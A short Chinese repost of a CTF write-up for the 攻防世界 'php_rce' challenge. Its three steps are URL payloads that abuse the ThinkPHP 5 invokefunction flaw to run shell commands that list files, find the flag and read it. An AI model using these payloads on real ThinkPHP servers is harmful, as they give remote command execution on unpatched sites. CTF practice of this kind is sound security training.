首页 > Web开发 > 详细

攻防世界-web-高手进阶区003-php_rce

时间:2020-03-12 14:16:51      阅读:198      评论:0      收藏:0      [点我收藏+]

1.thinkphp5 rce漏洞构造payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27

 技术分享图片

 

 

2.寻找flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name ‘flag‘");%27

 技术分享图片

 

 

3.查看flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27

 技术分享图片

 

 

4.漏洞详情可查看,https://blog.csdn.net/qq_40884727/article/details/101452478

 


 

攻防世界-web-高手进阶区003-php_rce

原文:https://www.cnblogs.com/joker-vip/p/12468769.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!